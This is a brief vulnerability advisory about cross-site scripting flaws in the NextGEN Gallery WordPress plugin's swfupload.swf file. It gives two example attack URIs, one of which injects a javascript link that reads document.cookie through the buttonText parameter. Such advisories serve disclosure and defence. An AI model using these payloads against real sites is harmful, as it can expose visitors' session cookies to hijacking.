WordPress NextGEN Gallery Plugin 'swfupload.swf' Multiple Cross Site Scripting Vulnerabilities

WordPress NextGEN Gallery Plugin 'swfupload.swf' Multiple Cross Site Scripting Vulnerabilities

An attacker can exploit these issues by enticing an unsuspecting user to visit a specially crafted URL.

The following example URIs are available:

http://www.example.com/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?buttonText=<ahref='javascript:alert(document.cookie)'>Click me</a>

http://www.example.com/Wordpress/wp-content/plugins/nextgen-gallery/admin/js/swfupload.swf?movieName=[XSS]